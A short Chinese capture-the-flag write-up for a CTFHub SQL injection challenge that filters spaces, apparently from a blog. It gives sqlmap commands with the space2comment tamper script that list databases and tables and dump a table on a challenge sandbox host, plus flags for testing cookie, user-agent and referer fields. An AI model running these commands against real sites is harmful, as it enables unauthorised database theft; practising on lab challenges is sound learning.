【CTFHub】sql注入-过滤空格及其他类型的

题目:

图1. 题目截图

解题思路:

遇到sql注入问题统一用sqlmap去解决,基础的(字符型,整型,时间,布尔等)均可参考我上篇文章去解决:https://www.jianshu.com/p/05b33402afe9

本题难点:

但是如果按照普通的命令去解答此题,就会发现找不到表。
因此我们要加上绕过命令 --tamper=space2comment

  • Step1
    python sqlmap.py -u "http://challenge-0f77d2a1347c4a5e.sandbox.ctfhub.com:10800/?id=1" --batch --dbs --tamper=space2comment
  • Step2
    python sqlmap.py -u "http://challenge-0f77d2a1347c4a5e.sandbox.ctfhub.com:10800/?id=1" --batch --tables -D sqli --tamper=space2comment

  • Step3
    python sqlmap.py -u "http://challenge-0f77d2a1347c4a5e.sandbox.ctfhub.com:10800/?id=1" --batch --dump -T gdjytroshe -D sqli --tamper=space2comment

注意:

如果出现感觉值不对,或者是的情况,可以把对应处理的日志给删除了,在跑一遍。


这是出现了错误的图片
重新再跑了一遍正确的图片

其他类型情况:

1. cookie型:

补充在命令里面补充语句:

--cookie "id=1;" --level 3 

2. user-agent(ua)型:

--user-agent "id=1"

3. reffer型

--refer "id=1"

你可能感兴趣的:(【CTFHub】sql注入-过滤空格及其他类型的)